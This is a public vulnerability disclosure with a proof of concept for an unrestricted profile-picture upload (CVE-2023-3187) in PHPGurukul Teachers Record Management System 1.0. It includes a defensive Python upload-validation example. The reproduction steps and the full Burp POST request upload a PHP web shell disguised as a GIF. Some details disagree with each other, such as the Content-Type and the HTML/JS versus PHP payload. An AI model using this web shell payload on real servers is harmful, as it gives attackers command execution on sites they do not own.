CVE-2023-3187: Vulnerability/trms.md at main · ctflearner/Vulnerability
A vulnerability, which was classified as critical, has been found in PHPGurukul Teachers Record Management System 1.0. Affected by this issue is some unknown functionality of the file /changeimage.php of the component Profile Picture Handler. The manipulation of the argument newpic leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-231176.
**TEACHER RECORD MANAGEMENT SYSTEM v1.0-POC**

**TITLE**
- Teachers Record Management System 1.0 – File Upload Type Validation Error in /changeimage.php
**DESCRIPTION**
The upload functionality for updating the user profile picture does not properly validate the file's content type or filename, allowing any authenticated user to bypass this security check by adding a valid signature (e.g. GIF89a) and sending any invalid content type. This could allow an authenticated attacker to upload HTML files with JS content that will be executed in the context of the domain.
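The checks the description says are missing, written out as an added example (not the project's code, and in Python rather than the application's PHP): the upload is accepted only if the filename has exactly one allowlisted extension, the declared Content-Type and file signature both match that extension, a GIF is walked block by block so nothing can trail the 0x3B trailer, and the file is stored under a server-chosen name. `ALLOWED`, `validate_upload` and the 1x1 `GIF_OK` sample are constructed here; PNG and JPEG get only the signature check in this block, and in practice would be re-encoded with an image library.

```python
import os, secrets
# Constructed allowlist: extension -> (required Content-Type, required file signature)
ALLOWED = {"png": ("image/png", b"\x89PNG\r\n\x1a\n"),
           "jpg": ("image/jpeg", b"\xff\xd8\xff"),
           "gif": ("image/gif", b"GIF8")}

def _skip_subblocks(data, pos):
    # GIF data sub-blocks: length byte + payload, terminated by a 0 byte
    while pos < len(data):
        n, pos = data[pos], pos + 1
        if n == 0:
            return pos
        pos += n
    return None  # ran off the end: truncated or malformed

def gif_is_well_formed(data):
    # Walk the GIF block structure; any bytes after the 0x3B trailer are rejected
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return False
    pos = 13                                   # header (6) + logical screen descriptor (7)
    if data[10] & 0x80:                        # global colour table: 3 * 2^(N+1) bytes
        pos += 3 * (2 << (data[10] & 7))
    while pos is not None and pos < len(data):
        tag, pos = data[pos], pos + 1
        if tag == 0x3B:                        # trailer: the file must end exactly here
            return pos == len(data)
        if tag == 0x21:                        # extension: label byte, then sub-blocks
            pos = _skip_subblocks(data, pos + 1)
        elif tag == 0x2C and pos + 9 <= len(data):   # image descriptor (9 bytes)
            lct = 3 * (2 << (data[pos + 8] & 7)) if data[pos + 8] & 0x80 else 0
            pos = _skip_subblocks(data, pos + 9 + lct + 1)  # + local colour table + LZW min code size
        else:
            return False
    return False

def validate_upload(filename, declared_ctype, data):
    # Returns (accepted, detail); detail is the rejection reason or the server-chosen storage name
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) != 2 or parts[1] not in ALLOWED:      # rejects "x.php.gif" double extensions
        return False, "extension must be exactly one of: " + ", ".join(ALLOWED)
    mime, magic = ALLOWED[parts[1]]
    if declared_ctype != mime:
        return False, "Content-Type does not match the extension"
    if not data.startswith(magic):
        return False, "file signature does not match the extension"
    if parts[1] == "gif" and not gif_is_well_formed(data):
        return False, "GIF structure invalid or has trailing data"
    return True, secrets.token_hex(16) + "." + parts[1]  # user-supplied name never reaches disk

# Constructed 1x1 GIF: header, screen descriptor (no colour table), image descriptor, LZW data, trailer
GIF_OK = (b"GIF89a\x01\x00\x01\x00\x00\x00\x00" + b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"
          + b"\x02\x02\x44\x01\x00\x3b")
```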
**STEPS-TO-REPRODUCE**
- Log in to the Teacher account with the credentials "Username: [email protected]", "Password: Test@123"
- Navigate to the Profile section and edit the profile picture by clicking on Edit Image
- Open Burp Suite and intercept the Edit Image request
- In the POST request, change the **Filename** from "profile picture.png" to "profile picture.php.gif"
- Change the **Content-Type** from "image/png" to "image/jpg"
- And add this **Payload**: `GIF89a <?php echo system($_REQUEST['dx']); ?>`
- Where **GIF89a is the GIF magic bytes; this bypasses the file upload extension check**
- Below is the Burp Suite POST request with all the changes that I have made above
**BURPSUITE_POST_REQUEST**

```http
POST /trms/teacher/changeimage.php HTTP/1.1
Host: localhost
Content-Length: 442
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/trms/teacher/changeimage.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc
Connection: close

------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="subjects"

John Doe
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"
Content-Type: image/gif

GIF89a <?php echo system($_REQUEST['dx']); ?>
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="submit"


------WebKitFormBoundaryndAPYa0GGOxSUHdF--
```
**PROOF_OF_CONCEPT**